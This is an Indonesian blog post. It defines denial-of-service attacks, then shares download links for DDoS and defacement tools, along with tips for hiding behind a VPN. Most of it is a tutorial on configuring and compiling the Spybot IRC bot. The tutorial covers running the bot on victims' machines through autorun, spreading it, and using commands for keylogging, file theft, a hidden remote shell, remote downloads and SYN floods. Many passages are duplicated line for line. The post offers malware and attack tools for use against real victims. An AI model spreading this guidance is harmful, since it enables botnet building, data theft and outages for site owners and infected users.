Menurut Wikipedia
Serangan DoS (bahasa Inggris: denial-of-service attacks’) adalah
jenis serangan terhadap sebuah komputer atau server di dalam jaringan
internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh
komputer tersebut sampai komputer tersebut tidak dapat menjalankan
fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna
lain untuk memperoleh akses layanan dari komputer yang diserang
tersebut.
Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:
Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.
Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.
Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.
Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:
Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.
Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.
Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.
Ini adalah link DDOS Attack Tools, bisa d sedot free
Kumpulan DDos Online :
HULK DDoSser:
http://www.mediafire.com/?tb7d9t203v7twdy
http://www.mediafire.com/?tb7d9t203v7twdy
TORSHAMMER:
http://pastebin.com/Vq90V9yn
http://pastebin.com/Vq90V9yn
TOOL PACK: any password requests: 123123
http://www.mediafire.com/?syx7ad1yot8n3
http://www.mediafire.com/?syx7ad1yot8n3
Ddos tools -| LOIC |- download from here :
http://sourceforge.net/projects/loic/files/latest/download
http://sourceforge.net/projects/loic/files/latest/download
Anonymous
LOIC tutorial (if u dont know how to use it) :
http://www.youtube.com/watch?v=sQRu-J3f_Kw
http://www.youtube.com/watch?v=sQRu-J3f_Kw
FireFlood, Download :
http://www.2shared.com/file/2CGUUHtB/Fireflood_12.html
http://www.2shared.com/file/2CGUUHtB/Fireflood_12.html
Anonymous DoSer, Download :
http://www.2shared.com/file/UOZbt7I0/Anonymous_DoSer.html
http://www.2shared.com/file/UOZbt7I0/Anonymous_DoSer.html
Online HOIC (Change threads to 1,000 and enter URL)
http://pastehtml.com/view/blclqdm91.html
http://pastehtml.com/view/blclqdm91.html
[ Denial-of-service attack & Deface Programs ]
http://www.mediafire.com/?3j9lp4avc1tjplt
http://www.mediafire.com/?3j9lp4avc1tjplt
[ Cyber Ghost VPN Program ]
http://cyberghostvpn.com/
http://cyberghostvpn.com/
[ Free Emails To Use VPN ]
http://pastebin.com/G9yQhHmg
http://pastebin.com/G9yQhHmg
Serangan yang paling menakutkan sampai detik ini masih tetap di pegang oleh DDoS.
Serangan ini pula yang memaksa gedung putih memindahkan server mereka setelah membuat marah hacker dari c*** dan serangan yang membuat situs microsoft tidak bisa diakses. Anda bisa membayangkan betapa berbahayanya serangan tanpa obat seperti ini .
Serangan ini pula yang memaksa gedung putih memindahkan server mereka setelah membuat marah hacker dari c*** dan serangan yang membuat situs microsoft tidak bisa diakses. Anda bisa membayangkan betapa berbahayanya serangan tanpa obat seperti ini .
Hacker yang melancarkan serangan DDoS, haruslah mempunyai banyak komputer yang siap diperintah.
Komputer komputer ini dinamakan zombie. Hacker akan memerintahkan komputer zombie melalui perantara yang dinamakan sebagai master, disini kita akan menggunakan perantara(master) yaitu mIRC .
Komputer komputer ini dinamakan zombie. Hacker akan memerintahkan komputer zombie melalui perantara yang dinamakan sebagai master, disini kita akan menggunakan perantara(master) yaitu mIRC .
ketika sang hacker hendak melakukan serangan DDoS, ia hanya perlu
masuk ke komputer yang bertindak sebagai MASTER ini. Kemudian memberikan
perintah dari situ. Semua komputer zombie yang mendengarkan perintah
dari tuannya akan segera melakukan serangan terhadap komputer korban
yang di tentukan oleh hacker.
BAGAIMANA MENCARI ZOMBIE ?
Untuk melakukan serangan DDoS, syarat utamanya adalah memiliki pasuka
Zombie sebanyak banyaknya. Semakin banyak seseorang memiliki komputer
zombie, maka kekuatannya semakin besar dan dengan mudah ia bisa membuat
situs manapun yang tidak mempunyai bandwidh yang sebanding dengan nya
untuk down. Sebesar apapun bandwidh, pastilah ada batasnya dan ini
adalah inti dari serangan DDoS.
ZOMBIE TIDAK HANYA UNTUK DDoS !
Seorang hacker yang memiliki banyak zombie, tidak hanya memanfaatkan
pasukannya untuk melakukan serangan DDoS. Hacker bisa melakukan banyak
sekali ha-hal yang mengerikan dengan pasukannya, diantaranya adalah :
1. sebagai SPAMMER.
2. Pay Per Click ( PPC ).
3. Pencurian bandwidh dan space.
2. Pay Per Click ( PPC ).
3. Pencurian bandwidh dan space.
dan sekarang kita membahas cara membuat nya…
——————————————SPYBOT—————————————
Spybot merupakan salah satu bot yang terkenal di dunia Cyb3R atau
Und3R Gr0unD dan sangat luas digunakan oleh para hacker. Bot ini dibuat
dengan bahasa C oleh Mich yang sebelumnya disebarkan secara terbatas
melalui situs nya .
Karena program ini berupa source code, Anda harus melakukan proses
kompilasi yang sering menakutkan pengguna awam. Namun, Anda tidak perlu
khawatir, pembuat program ini telah menyediakan sebuah batch file yang
tinggal anda klik dana selesailah sudah.
Saya mendownload compiler gratis bahasa C seperti yang disarankan
yaitu lcc-win32, program ini saya akan upload. Sangatlah mudah dan tidak
ada yang perlu diceritakan lebih lanjut. Anda hanya perlu klik
next,next,finish dan selesai.
File sumber SPYBOT terdiri atas file spybot.c yang merupakan source
kod file sedangkan konfigurasi disimpan pada file yang berbeda yaitu
settings.h . Anda menetukan sifat dan karakterik file spybot yang hendak
diciptakan melalui file settings.ini .
Sebagai contoh nya, saya mengambil beberapa baris pntig pada file settings.h
char password[] = “passwordanda”; //bots password
char channel[] = “#channelanda”; //channel bot joins on connect
char channel[] = “#channelanda”; //channel bot joins on connect
pada baris password[] merupakan password untuk memerintah bot, tanpa
mengetahui password ini, bot akan diam seribu bahasa ketika anda
perintahkan melakukan sesuatu.
Secara deffault, password yang digunakan adalah “passwordanda” ….
Secara deffault channel tersebut diset dengan #channelanda .
mIRC mempunyai banyak sekali jaringan-jaringan yang berdiri sendiri.
Misalnya, server-server dalam kelompok dalnet, tidak bisa berhubungan
dengan server-server dalam kelompok undernet karena keduanya saling
berdiri sendiri…
Karena itu, kita juga perlu menentukan server mana channel
#channelanda akan dibuat. Baris yang menentukan hal ini berada pada
baris berikut :
//servers
char *ircservers[]={
“127.0.0.1″,
“irc.icq.com”,
NULL //dont remove this line
};
“127.0.0.1″,
“irc.icq.com”,
NULL //dont remove this line
};
//number of ports MUST be the same as the number of servers you use,
int serverports[]={
6667,
6666,
6667,
6666,
};
Secara deffault server yang akan digunakan dimasukkan kedalam array
bernama ircservers yang secara deffault menggunakan 127.0.0.1 dan server
irc.icq.com. Nomor port yang digunakan harus sesuai jumlahnya dengan
server yang digunakan karena menggunakan dua server, terdapat dua port
yang digunakan yaitu 6667 dan 6666.
jika anda hendak merubahnya ke server dalnet misalnya, Anda juga
harus mengetahui port yang digunakan oleh server tersebut dan mengisinya
pada baris serverports[].
Untuk mengetahui nama server dan juga nama port server mIRC, Anda bisa mendownload list server-server mIRC dari internet.
Saya menggunakan software mIRC dan dari situ juga bisa dilihat dengan mengklik tombol
Option>Connect>Servers>Pilih Server IRC>Edit.
Saya menggunakan software mIRC dan dari situ juga bisa dilihat dengan mengklik tombol
Option>Connect>Servers>Pilih Server IRC>Edit.
terlihat server irc.icq.com termasuk dalam kategori group IrCQNet.
Pada contoh ini, Saya tidak akan merubah server yang digunakan dan hanya menghapus server lokal 127.0.0.1 karena memang tidak di perlukan. Code akhir setelah saya edit akan tampak seperti berikut..
Pada contoh ini, Saya tidak akan merubah server yang digunakan dan hanya menghapus server lokal 127.0.0.1 karena memang tidak di perlukan. Code akhir setelah saya edit akan tampak seperti berikut..
char *ircservers[]={
“irc.icq.com”,
NULL //dont remove this line
};
“irc.icq.com”,
NULL //dont remove this line
};
//number of ports MUST be the same as the number of servers you use,
int serverports[]={
7000,
7000,
};
Setelah proses konfigurasi selesai dilakukan, saatnya untuk melakukan kompilasi.
Klik file “Make spybot.bat” yang akan menghasilkan file spybot.exe. File inilah yang nantinya harus dijalankan di komputer korban.
anda dapat membuat autorun untuk menjalankan file ini secara otomatis di komputer korban..
dan tinggal anda pikirkan dan kembangkan sendiri supaya dapat menyebar luaskan file ini…
Klik file “Make spybot.bat” yang akan menghasilkan file spybot.exe. File inilah yang nantinya harus dijalankan di komputer korban.
anda dapat membuat autorun untuk menjalankan file ini secara otomatis di komputer korban..
dan tinggal anda pikirkan dan kembangkan sendiri supaya dapat menyebar luaskan file ini…
Berikut adalah fungsi menarik yang tersedia :
*ingat bahwa anda bisa mengganti printah default ini dengan kata lain sesuai dengan kehendak anda melalui file settings.h
*ingat bahwa anda bisa mengganti printah default ini dengan kata lain sesuai dengan kehendak anda melalui file settings.h
Login password = untuk memerintahkan bot yang diberi password, Anda harus login terlebih dahulu dengan perintah ini
raw [raw command] = Mengirimkan perintah-perintah ke IRC. Anda bisa
mempelajari perintah IRC untuk mengetahuinya lebih lanjut (contoh: raw
PRIVMSG #spybot1.1:hello)
list [path+filter] = Melihat file, sama dengan perintah dir. (contoh list c:\*.*)
delete [filename] = menghapus file. (contoh : delete c:\windows\netstat.exe)
executa [filename] = Menjalankan file atau program. (contoh : execute
c:\windows\system32\notepad.exe). program notepad akan di jalankan di
komputer zombie.
rename [originalfile] [newfile] = Merubah nama file (contoh : rename c:\windows\netstat.exe c:\windows\netstatbackup.bak)
makedir [dirname] = Membuat direktory (contoh : makedir c:\test\ )
startkeylogger = menjalankan keylogger di komputer zombie.
stop keylogger = mematikan keylogger di komputer zombie.
sendkeys [keys] = Mensimulasikan ketikan keyboard. Anda bisa
mengirimkan ketikan keyboard dengan perintah ini. Sebagai contohnya,
jika anda mengirimkan perintah “sendkeys zom-zom” maka tulisan
om-zom akan terkirim.
Saya tidak mengetahui kenapa huruf pertamanya hilang namun, anda bisa menceganya dengan menggunakan spasi di depan karakter yang hendak di kirim
om-zom akan terkirim.
Saya tidak mengetahui kenapa huruf pertamanya hilang namun, anda bisa menceganya dengan menggunakan spasi di depan karakter yang hendak di kirim
keyboardlights = Menyalakan lampu keyboard sebanyak 50 kali ( tindakan iseng ).
info = memberikan informasi tentang komputer zombie.
listprocesses = melihat proses yang sedang berjalan di komputer zombie.
killprocess [processname] = mematikan proses(contoh : killprocess firefox.exe)
reconnect = memintah komputer zombi untuk disconnect dari server IRC dan melakukan koneksi kembali.
disconnect [sec.] = meminta komputer zombie untuk disconnect dari IRC dalam beberapa waktu tertentu.
quit = mematikan bot
reboot = reboot komputer zombie
cd-rom [0/1] = jika 0 maka akan menutup cd-rom, jika 1 maka akan membuka cd-rom.
httpserver [port] [root-dir] = menjalankan fungsu server web. (contoh
: httpserver 80 C:\ ).dengan perintah ini anda bisa mem-browse ke
alamat IP zombie dan melihat semua file yang ada di drive C dengan
browser.
syn [host] [port] [delat msec.] [times] = melakukan serangan syn (contoh : syn 127.0.0.1 80 100 1000)
Threads = Menampilkan semua proses yang sedang di jalankan oleh bot.
killthread [number] = mematikan proses, number adalah nomor yang di dapatkan pada threads sebelumnya.
get [filename] = mengambil file yang ada di komputer zombie.
opencmd = menjalankan program cmd pada komputer zombie dalam modus tersembunyi..
cmd [command] = mengirim perintah . (sebelumnya harus menggunakan opencmd).
scan [start ip address] [port] [delay] [filename] = melakukan scanning (contoh :
scan 127.0.0.1 17300 1 portscan.txt
scan 127.0.0.1 17300 1 portscan.txt
download [url] [filename] = mendownload file dari internet.
(contoh : download http://127.0.0.0/server.exe c:\server.exe
uninstall = uninstall program bot dari komputer korban. Perintah ini
akan membuat program bot tidak aktif lagi di komputer korban namun file
bot nya sendiri tidak terhapus.
sudah cukup saya, capek ngetik nya,,,
mudah mudahan bermanfaat ….
————————————————————————————–
————————————————————————————–
untuk mendownload file” SPYBOT disini
4shared.com 4shared.com/file/205543442/92b83358/Spybot.html
4shared.com 4shared.com/file/205543442/92b83358/Spybot.html
sedangkan untuk mendownload lcc-win32
4shared.com 4shared.com/file/205552015/f37eb4b7/lcc-win32.html
4shared.com 4shared.com/file/205552015/f37eb4b7/lcc-win32.html
dan bagi yang mau cheat rock legend,,,
4shared.com 4shared.com/file/205542633/11c62602/How_to_cheat_rock_legend.html
Sumber : Hacker Indonesia Grup (fb.com)
4shared.com 4shared.com/file/205542633/11c62602/How_to_cheat_rock_legend.html
Sumber : Hacker Indonesia Grup (fb.com)
No comments:
Post a Comment
terimah kasih udh memberi masukan